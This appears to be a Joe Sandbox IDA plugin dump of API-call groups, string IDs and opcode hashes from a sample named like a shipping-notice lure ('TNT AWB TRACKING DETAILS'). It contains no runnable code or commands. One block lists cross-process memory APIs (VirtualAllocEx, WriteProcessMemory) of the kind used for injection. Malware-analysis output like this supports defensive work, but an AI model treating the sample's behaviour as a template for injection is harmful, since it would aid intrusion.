                                                    • GetSystemMetrics.USER32(00000004), ref: 00F4B1F8
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F30E90,00000000), ref: 00F4B216
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F19320
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F19352
                                                    • __itow.LIBCMT ref: 00F1936A
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F19392
                                                    • __itow.LIBCMT ref: 00F193A3
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00F35A6E
                                                    • GetForegroundWindow.USER32 ref: 00F35A85
                                                    • GetDC.USER32(00000000), ref: 00F35AC1
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00F35ACD
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00F35B08
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EC134D
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC135C
                                                    • BeginPath.GDI32(?), ref: 00EC1373
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC139C
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F24ABA
                                                    • __beginthreadex.LIBCMT ref: 00F24AD8
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F24AED
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F24B03
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F24B0A
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F1821E
                                                    • GetLastError.KERNEL32(?,00F17CE2,?,?,?), ref: 00F18228
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F17CE2,?,?,?), ref: 00F18237
                                                    • HeapAlloc.KERNEL32(00000000,?,00F17CE2,?,?,?), ref: 00F1823E
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F18255
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 6cfab5b9e87992f667d4bd9a104fcf7d0b65ab74e0ffc76a7daf95d400218c77
                                                    • Instruction ID: 94a99f9cc95178e2f50e4f9479f5af0e8ae499c79c51e9517d6acd7d7c54a299
                                                    • Opcode Fuzzy Hash: 6cfab5b9e87992f667d4bd9a104fcf7d0b65ab74e0ffc76a7daf95d400218c77
                                                    • Instruction Fuzzy Hash: EE016D75600248BFDB214FA5DD48DAB7BACEF9B7A4B500429FD09C2220DA318C45EA60
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?,?,00F17455), ref: 00F17127
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17142
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17150
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?), ref: 00F17160
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F1716C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 1a45cf92129153ca252a05805c4e6844965f223294b7b37420e8a31bb93ef5ed
                                                    • Instruction ID: 4ad3cdc86a9887b93f5af921a6a7a87984cea258e65c37ce773a4eb29b18ef2c
                                                    • Opcode Fuzzy Hash: 1a45cf92129153ca252a05805c4e6844965f223294b7b37420e8a31bb93ef5ed
                                                    • Instruction Fuzzy Hash: 04018476601308BBDB115F64DC44BAA7BBDEF45761F140064FD0DE6220D771DD81ABA0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F25260
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F2526E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F25276
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F25280
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 740e5b23552c91d390f5d20ae71fa00da4206d234ecf0d06bfbeae565bb546ed
                                                    • Instruction ID: 369211302a5c80c0e815073b0bfa57866df7f7c0a2996158f59d96be9ffdedec
                                                    • Opcode Fuzzy Hash: 740e5b23552c91d390f5d20ae71fa00da4206d234ecf0d06bfbeae565bb546ed
                                                    • Instruction Fuzzy Hash: 38016935D02A2DDBCF00EFE4EC48AEDBBB8FB4AB11F410056E945B21C0CB709554A7A1
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F18121
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1812B
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1813A
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18141
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18157
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: b981cd928eb4e51bd09ae8b94f1b39bdad5028509791075ead51822577222cc2
                                                    • Instruction ID: 4bfbb23159fd1186a6c7d21d589542c1359cbe1392e5ba74336a3edf2d3dddef
                                                    • Opcode Fuzzy Hash: b981cd928eb4e51bd09ae8b94f1b39bdad5028509791075ead51822577222cc2
                                                    • Instruction Fuzzy Hash: ABF06875640308BFE7110FA5DCC8EA73BADFF867A4B100025F949D6150CBA19D46EA60
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F1C1F7
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F1C20E
                                                    • MessageBeep.USER32(00000000), ref: 00F1C226
                                                    • KillTimer.USER32(?,0000040A), ref: 00F1C242
                                                    • EndDialog.USER32(?,00000001), ref: 00F1C25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 8e72dd86ad2a5f4a0dbc58a88b4eadceb46b1ef17892cb9b246e2f052e52034c
                                                    • Instruction ID: 2de4a4b6a298467f25b857f915e78a5b823cb87095f31b20cb9095319c8b5919
                                                    • Opcode Fuzzy Hash: 8e72dd86ad2a5f4a0dbc58a88b4eadceb46b1ef17892cb9b246e2f052e52034c
                                                    • Instruction Fuzzy Hash: A001DB348443089BEB205B54DD4EFD677B8FF11705F00026DF986A14E0D7F46988EB90
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 00EC13BF
                                                    • StrokeAndFillPath.GDI32(?,?,00EFB888,00000000,?), ref: 00EC13DB
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC13EE
                                                    • DeleteObject.GDI32 ref: 00EC1401
                                                    • StrokePath.GDI32(?), ref: 00EC141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 0acb7bad4349fbfa7ded16edbbaef8e9278289c8a51a5587f4de12821b3e9064
                                                    • Instruction ID: 6cf033c407bdcc7f45f3bb1261d532ba6379e28306f1fc9aba7b77958fa16489
                                                    • Opcode Fuzzy Hash: 0acb7bad4349fbfa7ded16edbbaef8e9278289c8a51a5587f4de12821b3e9064
                                                    • Instruction Fuzzy Hash: C1F0313400474CDBDB155F1AED4CBA83FE4BB5272AF189269F829580F2C7314596EF10
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F2C432
                                                    • CoCreateInstance.OLE32(00F52D6C,00000000,00000001,00F52BDC,?), ref: 00F2C44A
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • CoUninitialize.OLE32 ref: 00F2C6B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 88f3b07931c8702be36be92e954e2fedcaf66b8790467b26eaa1e43276619a20
                                                    • Instruction ID: f149b3a5d5f269ee3eefcb58004220fe3db6530f8e706060a1c1147a27ff37a5
                                                    • Opcode Fuzzy Hash: 88f3b07931c8702be36be92e954e2fedcaf66b8790467b26eaa1e43276619a20
                                                    • Instruction Fuzzy Hash: EBA14B72104305AFD304EF54CD81EABB7E8EF99354F00491CF5959B1A2DB71E94ACB52
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00EC7A51: _memmove.LIBCMT ref: 00EC7AAB
                                                    • __swprintf.LIBCMT ref: 00ED2ECD
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00ED2D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 40276975b0e2f2280b9e1a053a8bd033e314d53405332550948de1feafd07dd5
                                                    • Instruction ID: 31941132a8354b969b9551e6d375c8a5b97cbfee5e4e5ba2eac56696db2effaf
                                                    • Opcode Fuzzy Hash: 40276975b0e2f2280b9e1a053a8bd033e314d53405332550948de1feafd07dd5
                                                    • Instruction Fuzzy Hash: 75919DB21083019FCB14EF24C985D6EB7E4EF95310F00281EF991EB2A1EA71ED46DB52
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                    • CoInitialize.OLE32(00000000), ref: 00F2B9BB
                                                    • CoCreateInstance.OLE32(00F52D6C,00000000,00000001,00F52BDC,?), ref: 00F2B9D4
                                                    • CoUninitialize.OLE32 ref: 00F2B9F1
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 018f33359ce735a0e6cad5b52b78af2cd2026c4090079956a055797df862c9d9
                                                    • Instruction ID: d9c0cd2c9321abfdff3c0dfe86d3ec8174effe5afc68cf8c42d335f9c13d33f7
                                                    • Opcode Fuzzy Hash: 018f33359ce735a0e6cad5b52b78af2cd2026c4090079956a055797df862c9d9
                                                    • Instruction Fuzzy Hash: F7A146756043159FCB04DF14C584E5ABBE5FF89324F148998F899AB3A2CB32EC46CB91
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00EE50AD
                                                      • Part of subcall function 00EF00F0: __87except.LIBCMT ref: 00EF012B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: b432bda8f5f495b9a5008c7b31ae86874376821c082a18946861df6288ee5181
                                                    • Instruction ID: a35443c49facb7f6c45357636cf179c2242957a9481c8071b68e6afb2db10a27
                                                    • Opcode Fuzzy Hash: b432bda8f5f495b9a5008c7b31ae86874376821c082a18946861df6288ee5181
                                                    • Instruction Fuzzy Hash: 7951AE2290DA4D86DB11B715CC053BE3BD09B4070CF20AD99F5D5A62ABEF348DC4AA82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3c$_
                                                    • API String ID: 4104443479-4099079164
                                                    • Opcode ID: dba90de6778877de7382e6e76754aadfa72123355a0c52a551756b4a732628ac
                                                    • Instruction ID: 13a867c875d9460fde917a1daf7ae214d181e272f901c5175753d577eec243a1
                                                    • Opcode Fuzzy Hash: dba90de6778877de7382e6e76754aadfa72123355a0c52a551756b4a732628ac
                                                    • Instruction Fuzzy Hash: 99515170D00609DFCF24CF68C880AAEB7B1FF45354F14852AE85AE7390DB31A956EB51
                                                    APIs
                                                      • Part of subcall function 00F214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F19296,?,?,00000034,00000800,?,00000034), ref: 00F214E6
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F1983F
                                                      • Part of subcall function 00F21487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F214B1
                                                      • Part of subcall function 00F213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F21409
                                                      • Part of subcall function 00F213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F1925A,00000034,?,?,00001004,00000000,00000000), ref: 00F21419
                                                      • Part of subcall function 00F213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F1925A,00000034,?,?,00001004,00000000,00000000), ref: 00F2142F
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F198AC
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F198F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: d04d7939cec15286619065e082a9a8e7f9fb217fb3be4dc0a9360004f4de93af
                                                    • Instruction ID: ac7d9ddb01c64fde7deac72a0b2c67980329d240fb2e2240698245fd88d6e03e
                                                    • Opcode Fuzzy Hash: d04d7939cec15286619065e082a9a8e7f9fb217fb3be4dc0a9360004f4de93af
                                                    • Instruction Fuzzy Hash: 73414F76D0111CAECB10DFA4CC51ADEBBB8EB15310F004099F949B7141DA706E85DBA0
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F4F910,00000000,?,?,?,?), ref: 00F479DF
                                                    • GetWindowLongW.USER32 ref: 00F479FC
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F47A0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: d700c4459a882d0e4e571fe6a60ce84fd15d52eca2e5bd1d4ba6c512060a3504
                                                    • Instruction ID: 518293c5c93e91565cec17ff7d444807fe9af948617db1895463c9d2a55e735a
                                                    • Opcode Fuzzy Hash: d700c4459a882d0e4e571fe6a60ce84fd15d52eca2e5bd1d4ba6c512060a3504
                                                    • Instruction Fuzzy Hash: 4631D03160420AABDB119E38CC45BEB7BA9EB05334F244729FC79A22E1D731ED51AB50
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F47461
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F47475
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F47499
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: ed90e34ab160b9a26f48b989d32cb67637ba46e6c61e53447e5712f9c4b59690
                                                    • Instruction ID: 1e61950539be86b32117018772fa450bf82aa7a05ecee413a97bc156bccc68a9
                                                    • Opcode Fuzzy Hash: ed90e34ab160b9a26f48b989d32cb67637ba46e6c61e53447e5712f9c4b59690
                                                    • Instruction Fuzzy Hash: 2D219F32500218ABDF11DE64CC46FEA3F69EB48724F110214FE196B1A0DBB5AC95EBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F47C4A
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F47C58
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F47C5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
